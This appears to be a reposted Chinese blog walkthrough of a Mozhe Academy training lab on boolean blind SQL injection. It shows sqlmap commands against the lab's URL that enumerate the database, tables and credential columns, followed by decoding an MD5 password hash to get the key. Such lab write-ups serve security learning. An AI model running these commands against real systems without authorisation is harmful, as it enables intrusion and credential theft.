墨者学院——SQL注入漏洞测试(布尔盲注)
发布日期:2021-06-30 17:41:04
浏览次数:2
分类:技术文章
本文共 605 字,大约阅读时间需要 2 分钟。
题目: 背景介绍 一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。
所以从这里的URL入手,存在注入点
利用sqlmap注入:
- sqlmap.py -u url --current-db 获取到的数据库名是stormgroup
sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 --current-db
- sqlmap.py -u url -D 获取到的数据名 --tables 获取到的表是member和notice
sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 -D stormgroup --table
- sqlmap.py -u url -D 获取到的数据库名 -T 获取到的表名 --columns 获取到的列名分别是 name password status
sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 -D stormgroup -T member --columns
- 接下来就不断按回车,最后出现name和password,有两个所以要分别尝试(password需要通过MD5解码才行):
提交得到KEY
转载地址:https://leo-max.blog.csdn.net/article/details/104235489 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!
发表评论
最新留言
关注你微信了!
[***.104.42.241]2024年04月16日 13时33分16秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
GAN系列(零)—— GAN的发展(两条路线)
2019-04-30
Conditional GAN (CGAN) 条件生成网络
2019-04-30
强化学习(三) —— Policy Gradient 策略梯度
2019-04-30
docker安装oracle(win10)
2019-04-30
Cloudera Quickstart & HUE
2019-04-30
HUE
2019-04-30
CDH
2019-04-30
行为树 BT
2019-04-30
Cassandra & CQL
2019-04-30
Oracle数据库
2019-04-30
Oracle数据库命令
2019-04-30
有限状态机FSM
2019-04-30
Win10 Docker
2019-04-30
Python绘制动画并保存为gif/mp4 (matplotlib)
2019-04-30
PRM概率路线图
2019-04-30
ROS(六)——订阅者Subscriber的编程实现(C++ & Python)
2019-04-30
ROS(七)——话题消息的定义与使用
2019-04-30
yolov3入门实战
2019-04-30
B树 & B+树
2019-04-30
Node-Red(一)——简介与安装
2019-04-30